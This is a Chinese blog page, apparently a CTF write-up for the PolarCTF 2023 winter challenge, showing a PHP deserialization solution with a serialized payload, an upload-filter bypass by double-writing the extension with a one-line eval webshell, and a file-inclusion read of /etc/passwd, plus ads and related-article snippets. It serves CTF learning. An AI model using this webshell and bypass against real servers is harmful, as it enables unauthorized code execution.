PolarCTF2023冬季个人挑战赛wp含web、misc、crypto_polar冬季赛

最新推荐文章于 2024-12-19 20:21:12 发布
最新推荐文章于 2024-12-19 20:21:12 发布
阅读量1k 收藏 13
点赞数 9
分类专栏: 2024年程序员学习 文章标签: 网络安全 web安全 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_84558406/article/details/138986467
版权

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

<?php
class Index
{
    private $Polar1 = 3;
    private $Polar2 = 3;
    protected $Night = 3;
    protected $Light = 3;

    function getflag($flag)
    {
        $Polar2 = rand(0, 100);
        if ($this->Polar1 === $this->Polar2) {
            $Light = rand(0, 100);
            if ($this->Night === $this->Light) {
                echo $flag;
            }
        } else {
            echo "Your wrong!!!";
        }
    }
}
$a = new Index();
echo urlencode(serialize($a));
# O%3A5%3A%22Index%22%3A4%3A%7Bs%3A13%3A%22%00Index%00Polar1%22%3Bi%3A3%3Bs%3A13%3A%22%00Index%00Polar2%22%3Bi%3A3%3Bs%3A8%3A%22%00%2A%00Night%22%3Bi%3A3%3Bs%3A8%3A%22%00%2A%00Light%22%3Bi%3A3%3B%7D

因为php是不能直接给private和protected的变量直接赋值的,所以rand()函数直接废掉,不起作用
又或者变量引用

$a->Polar1=&$a->Polar2;
$a->Night=&$a->Light;

web-upload

$is\_upload = false;
$msg = null;
if (isset($\_POST['submit'])) {
    if (file\_exists(UPLOAD\_PATH)) {
        $deny\_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
 
        $file\_name = trim($\_FILES['upload\_file']['name']);
        $file\_name = str\_ireplace($deny\_ext,"", $file\_name);
        $temp\_file = $\_FILES['upload\_file']['tmp\_name'];
        $img\_path = UPLOAD\_PATH.'/'.rand(10000,99999).$file\_name;        
        if (move\_uploaded\_file($temp\_file, $img\_path)) {
            $is\_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else {
        $msg = UPLOAD\_PATH . '文件夹不存在,请手工创建!';
    }
}

明显双写绕过,将木马文件命名为a.pphphp即可,文件内容<?php eval($_POST['a']);
上传文件之后,可以F12查看网络,就可以看到文件上传的位置了,再用蚁剑连接即可
(补题发现,秋季那道ezupload,上传GIF文件,再抓包改php后缀,蚁剑,不过我连接的时候,警告返回数据为空??不应该啊)

web-你的马呢?

经典文件上传,注意到URL,可能存在文件包含,发现可以/etc/passwd,先读一下源码url/index.php?f

最低0.47元/天 解锁文章
PolarCTF2024冬季个人挑战赛wpwebmisccrypto_polar冬季
2401_84181501的博客
04-10 1183
外链图片转存中…(img-OGFMcT60-1712695420109)][外链图片转存中…(img-tWy489gX-1712695420109)][外链图片转存中…(img-SAAAl1z1-1712695420110)][外链图片转存中…(img-nttzCHF8-1712695420110)]
PolarCTF2023冬季个人挑战赛wpwebmisccrypto
HvAng10的博客
12-14 2892
是php.ini中的一个配置选项,它可将用户访问文件的活动范围限制在指定的区域,假设open_basedir=/home/wwwroot/home/web1/:/tmp/,那么通过web1访问服务器的用户就无法获取服务器上除了/home/wwwroot/home/web1/和/tmp/这两个目录以外的文件。得到一个flag.txt,里面的内容很明显是zip,改后缀,要密码,binwalk一下看是不是伪加密,拿到了flag,可惜是假的。emmmm,卡住了,笨b卡在了安装gaps上了,emmm,giao。
PolarCTF 2023冬季个人挑战赛 WriteUp (web部分)
m0_62652276的博客
12-14 669
PolarCTF 2023冬季个人挑战赛 web部分题 WriteUp
2023Polar CTF冬季个人挑战赛部分wp
ZJPC007的博客
12-10 654
第一次参加polarctf的比,做的不好,把做出来的题目wp传上来和大家分享做题方法,哪里有错还请大佬指教。题目还能复现的,在平台上就能做。
2024 polarctf冬季挑战赛
2301_80552914的博客
12-18 372
成功出来提示,访问ed3d2c21991e3bef5e069713af9fa6ca.php。题目给了5个模块,肯定是要管理员登录,然后进行文件上传的,先注册一个账号试试。这个题目考点主要是MD5强绕过和文件上传及对burp爆破模块的使用。发现有一堆flag,去flag认证系统爆破即可。要求我们必须是1.1.1.1才能执行命令。扫描目录发现有个login.php。发现waf,这里删除这个文件即可。响应头给了一个php文件地址。密码爆破出来是flower。进去发现是个MD5强比较。id换成xiaohei。
PolarCTF2024冬季-个人部分WPmisc+web
2301_79355407的博客
12-11 1850
PolarCTF2024冬季-个人部分WPmisc+web
WebPolarCTF2024秋季个人挑战赛wp
最新发布
m0_74823983的博客
12-19 607
page=flag对应了./flag.php,文件后缀写死了是php。自己也写过对应的文章,把fastjson换成snakeyaml就行。经过测试发现题目会将…/替换为空,双写绕过可以目录穿越。访问./hidden/hidden.php。上传一个png文件抓包改php后缀。一句话木马插在准备好的图片末尾。CC6打spring内存马。后面发现是,鉴定为傻逼题。访问./hidden。一开始给了php代码。
PolarCTF网络安全2023冬季个人挑战赛 WEB方向题解 WriteUp
Jay17的博客
12-10 3322
PolarCTF网络安全2023冬季个人挑战赛 WEB方向题解 WriteUp
Polar靶场 wu
m0_64016126的博客
12-14 468
/这一步是关键,_/_._由于分母_在做除法时会转换成0,相除后就是无穷 大,._ 让其强制转换为字符串就是NAN,['!//相当于$_POST[_]($_POST[__]);
polar CTF上传
samRsa
12-29 744
polar CTF 上传 经过上传测试发现,这题过滤掉了
polarD&N2023秋季个人挑战赛MISC
m0_61025358的博客
12-08 1902
CTF竞安全圈喜闻乐见的竞模式,对于培养网络安全技术人才起到了很重要的作用。CTF起源于1996年DEFCON全球黑客大会,是Capture The Flag的简称。经过多年的发展,CTF这种比形式已经日益成熟。 MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。
Polar靶场做题 —— test_format
2301_76262491的博客
10-12 736
PolarD&N_pwn_test_format
polar CTF web upload tutu
samRsa
01-02 966
polar CTF web upload tutu 照一张图片,我是直接将之前测试的一句话木马换了后缀改成了 test.jpg,然后会生成两个md5值相同个图片,分别上传到两个上传文件的位置得到flag。此处生成的md5值相同的文件你自己需要校验的话可以用下面的工具,也可直接跳过,生成的是一样的。找工具 fastcoll 可生成两个md5值相同的文件。1、上传两个一样的木马提示不是 setu(色图)2、上传两个图,提示md5值不一样。综上他需要两张md5值相同的图。
PolarCTF WEB题目 代码审计1WP
weixin_62257805的博客
10-13 427
PolarCTF WEB题目 代码审计1WP
【LinkCTF-29】Crypto--密码本
VZZmieshenquan的博客
03-02 2531
Description: 密码本(提交你找到的字符串的md5值) 这个密码本本该只使用一次的,但是却使用了多次,导致密文易被破解 经过一番尝试发现,秘钥的首字母很可能是y,剩下的就靠你了 cip1: rlojsfklecby cip2: ulakqfgfsjlu cip3: dpaxwxtjgtay Solution: 先写py脚本 看到thos猜测是those,经过测试key变为了ye...
polarctf靶场 【web】签到题、简单 rce、蜜雪冰城吉警店、到底给不给flag呢
m0_73981089的博客
04-24 3099
此时注意GET数组的值,$ _GET["flag"]=Polar​,而经过$_POST​的变量覆盖,​$ _GET =array(1) { ["flag"]=> string(4) "flag" } ​,故而最开始传GET参数时?并且value不能等于flag,若想输出执行到最后输出flag,那么变量覆盖时候不能将$flag 的值等于除flag 外的任意值,也就是说在foreach内的变量覆盖过程,需要实现。这样被解析之后,就是c=flag&flag=c。方法二:字符串转义绕过;
polar CTF WEB-veryphp
samRsa
01-01 983
polar CTF web veryphp 注意:用Burp Suite 抓包传payload,hackerbar等会将URL编码。 veryphp veryphp
PolarD&N-CTF-web方向-中等
J1ng_Hong的博客
12-12 3080
(由于发现中等题里面有许多新的知识点,所以特意拉了一个新的博客来展示)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值